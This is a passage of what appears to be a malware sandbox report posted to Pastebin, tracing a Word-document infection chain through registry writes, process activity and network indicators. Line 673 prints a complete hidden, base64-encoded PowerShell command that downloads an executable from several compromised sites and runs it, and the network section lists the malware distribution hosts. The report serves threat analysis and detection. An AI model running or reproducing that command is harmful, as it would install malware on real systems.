  619. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"  Set value (int)
  620. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2887302262"   Set value (int)
  621. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2917146139"   Set value (int)
  622. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000   Set value (data)
  623. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Set value (str)
  624. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLs\url1 = "https://suncityefficiencytour.it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/"    Set value (str)
  625. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 4c6bfe76f785d501   Set value (data)
  626. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" Set value (int)
  627. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\RepId\PublicId = "{F5CEA6C9-29B1-4722-9C19-47C8FB0DBC04}" Set value (str)
  628. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"  Set value (str)
  629.   Suspicious use of WriteProcessMemory
  630. iexplore.exe
  631. WINWORD.EXE
  632. Powershell.exe
  633. 25.exe
  634. acquiretexas.exe
  635. Reported IOC
  636. iexplore.exe
  637. PID 4924 wrote to memory of 4972
  638. PID 4924 wrote to memory of 4628
  639. Reported IOC
  640. WINWORD.EXE
  641. PID 4628 wrote to memory of 4156
  642. Reported IOC
  643. Powershell.exe
  644. PID 4856 wrote to memory of 724
  645. Reported IOC
  646. 25.exe
  647. PID 724 wrote to memory of 5116
  648. Reported IOC
  649. acquiretexas.exe
  650. PID 4260 wrote to memory of 4228
  651.   Suspicious behavior: EnumeratesProcesses
  652. WINWORD.EXE
  653. Powershell.exe
  654. acquiretexas.exe
  655.   Suspicious use of AdjustPrivilegeToken
  656. Powershell.exe
  657. Reported IOC
  658. Powershell.exe
  659. Token: SeDebugPrivilege
  660. C:\Program Files\Internet Explorer\iexplore.exe
  661. "C:\Program Files\Internet Explorer\iexplore.exe" https://suncityefficiencytour[.]it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/
  662. PID: 4924
  663. C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  664. "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\info_408170833067.doc" /o ""
  665. PID: 4628
  666. C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  667. "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Embedding
  668. PID: 4156
  669. C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  670. "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4924 CREDAT:82945 /prefetch:2
  671. PID: 4972
  672. C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  673. Powershell -w hidden -en JABHAG0AdAB0AHMAcABkAGQAaQBwAGEAawA9ACcARABnAHYAYwBmAG4AcQB5ACcAOwAkAFQAdABsAHMAcQBnAGIAdAB3AGwAdwBrAGYAIAA9ACAAJwAyADUAJwA7ACQAQgB0AGoAdAB6AG4AdQBrAHgAbQBpAGYAPQAnAEcAcABxAGQAZABxAHYAawBxACcAOwAkAFYAeABhAHEAcQB0AHYAegBtAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABUAHQAbABzAHEAZwBiAHQAdwBsAHcAawBmACsAJwAuAGUAeABlACcAOwAkAEEAaABhAHMAYwBpAGwAcQBiAD0AJwBUAGoAaQBiAGcAYQBzAHEAdQBiAGMAdwB6ACcAOwAkAEUAcQBnAGkAbwB1AHIAZABtAGgAbQA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBFAFQALgB3AEUAYgBjAEwASQBFAE4AVAA7ACQARQBuAHIAdgBjAGoAaQBlAG0AYQBhAD0AJwBoAHQAdABwADoALwAvAHcAaQBuAGcAcwBpAG4AZwByAGUAZQBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1AGoAcwA0ADIANwAvACoAaAB0AHQAcAA6AC8ALwBuAGEAawBoAGwAbQBhAHIAawBlAHQALgBjAG8AbQAvAGIAaABiAGwALwA3ADEAOAA3ADIANwAvACoAaAB0AHQAcABzADoALwAvAGoAbwBzAGUAcwBtAGUAeABpAGMAYQBuAGYAbwBvAGQAaQBuAGMALgBjAG8AbQAvAGkAbgBxAHUAaQByAGUALwBvADQAMQA1ADcANwAzAC8AKgBoAHQAdABwADoALwAvAHMAdABvAG4AZQBhAHIAeQBhAG4ALgBjAG8AbQAvAGYAbABhAHMAaABjAGgAYQB0AC8AMABjAG4AcwBiADMAMQAvACoAaAB0AHQAcABzADoALwAvAG0AdQBzAHQAYQBrAGgAYQBsAGYALgBjAG8AbQAvAGEANQBsAGcAaQAvAGgANQA4AGEANgB1ADAANAAzADUALwAnAC4AIgBzAFAAYABMAEkAVAAiACgAJwAqACcAKQA7ACQAVgB4AG4AdgByAGQAcQBvAD0AJwBVAHIAdQBlAHgAcAByAHAAbAAnADsAZgBvAHIAZQBhAGMAaAAoACQAWQBnAGgAYwBjAGcAawBrAHMAdAB5AGMAbQAgAGkAbgAgACQARQBuAHIAdgBjAGoAaQBlAG0AYQBhACkAewB0AHIAeQB7ACQARQBxAGcAaQBvAHUAcgBkAG0AaABtAC4AIgBkAE8AdwBOAGAATABgAG8AYQBEAGYAaQBsAGUAIgAoACQAWQBnAGgAYwBjAGcAawBrAHMAdAB5AGMAbQAsACAAJABWAHgAYQBxAHEAdAB2AHoAbQApADsAJABVAGIAagB2AHIAYQB6AGQAeQA9ACcAVgBiAG4AbwBkAGYAegBzACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVgB4AGEAcQBxAHQAdgB6AG0AKQAuACIAbABFAE4AYABHAFQAaAAiACAALQBnAGUAIAAyADIANQAxADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAEEAYABSAHQAIgAoACQAVgB4AGEAcQBxAHQAdgB6AG0AKQA7ACQAVgBtAGkAeABsAHcAbABrAGcAbgA9ACcAQQB2AGQAYQB6AGMAcgBsAHoAdgB0AHcAJwA7AGIAcgBlAGEAawA7ACQASQBsAG0AcQBzAHQAbABsAGcAeABuAHQAPQAnAFIAbwBlAG4AdQBoAG0AdAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAHAAbABqAGoAegB0AG0AZQA9ACcAWgB4AHEAdgBpAGkAbwBwAGYAbgBmACcA
  674. PID: 4856
  675. C:\Users\Admin\25.exe
  676. "C:\Users\Admin\25.exe"
  677. PID: 724
  678. C:\Users\Admin\25.exe
  679. --6dd7abed
  680. PID: 5116
  681. C:\Windows\SysWOW64\acquiretexas.exe
  682. "C:\Windows\SysWOW64\acquiretexas.exe"
  683. PID: 4260
  684. C:\Windows\SysWOW64\acquiretexas.exe
  685. --b26667d5
  686. PID: 4228
  687. 89.46.106.62:443
  688. suncityefficiencytour.it
  689. IEXPLORE.EXE
  690. 89.46.106.62:443
  691. suncityefficiencytour.it
  692. IEXPLORE.EXE
  693. 93.184.221.240:80
  694. ctldl.windowsupdate.com
  695. IEXPLORE.EXE
  696. 93.184.221.240:80
  697. ctldl.windowsupdate.com
  698. IEXPLORE.EXE
  699. GET
  700. 200
  701. 109.70.240.130:80
  702. http://ocsp05.actalis.it/VA/AUTH-ROOT/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEG6Ji2gdsJH8UzyM1j%2FYAOc%3D
  703. IEXPLORE.EXE
  704. GET
  705. 200
  706. 109.70.240.114:80
  707. http://ocsp09.actalis.it/VA/AUTHOV-G2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSH7LRwIYxAK55PTYjOJla%2FvWNK5gQUYv67J4pkRO1ollpYeaHbWiat%2F7sCEHDEl1QqtH3UxmUO1AJEGkU%3D
  708. IEXPLORE.EXE
  709. GET
  710. 200
  711. 109.70.240.114:80
  712. http://crl09.actalis.it/Repository/AUTHOV-G2/getLastCRL
  713. IEXPLORE.EXE
  714. 89.46.106.62:443
  715. suncityefficiencytour.it
  716. IEXPLORE.EXE
  717. 89.46.106.62:443
  718. suncityefficiencytour.it
  719. IEXPLORE.EXE
  720. GET
  721. 200
  722. 89.46.106.62:80
  723. http://www.suncityefficiencytour.it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/
  724. IEXPLORE.EXE
  725. 117.18.232.200:443
  726. iecvlist.microsoft.com
  727. iexplore.exe
  728. 93.184.220.29:80
  729. ocsp.digicert.com
  730. iexplore.exe
  731. 117.18.232.200:443
  732. iecvlist.microsoft.com
  733. 52.109.76.6:443
  734. officeclient.microsoft.com
  735. 52.109.88.40:443
  736. nexus.officeapps.live.com
  737. 52.109.88.36:443
  738. nexusrules.officeapps.live.com
  739. 103.21.58.201:80
  740. wingsingreen.com
  741. Powershell.exe
  742. GET
  743. 302
  744. 5.61.24.202:80
  745. http://nakhlmarket.com/bhbl/718727/
  746. Powershell.exe
  747. 185.225.236.136:443
  748. josesmexicanfoodinc.com
  749. Powershell.exe
  750. 171.22.26.31:80
  751. stonearyan.com
  752. Powershell.exe
  753. 54.36.221.251:443
  754. mustakhalf.com
  755. Powershell.exe
  756. 204.79.197.200:443
  757. ieonline.microsoft.com
  758. iexplore.exe
  759. 204.79.197.200:443
  760. ieonline.microsoft.com
  761. iexplore.exe
  762. 127.0.0.1:47001
  763. 93.184.221.240:80
  764. ctldl.windowsupdate.com
  765. 104.81.140.70:443
  766. fs.microsoft.com
  767. 68.187.160.28:443
  768. acquiretexas.exe
  769. 104.81.140.70:443
  770. fs.microsoft.com
  771. 104.81.140.70:443
  772. fs.microsoft.com
  773. 104.81.140.70:443
  774. fs.microsoft.com
  775. 52.109.76.6:443
  776. officeclient.microsoft.com
  777. WINWORD.EXE
  778. 52.109.88.40:443
  779. nexus.officeapps.live.com
  780. 52.109.88.36:443
  781. nexusrules.officeapps.live.com
  782. 97.120.32.227:80
  783. acquiretexas.exe
  784. 187.188.166.192:8080
  785. acquiretexas.exe
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!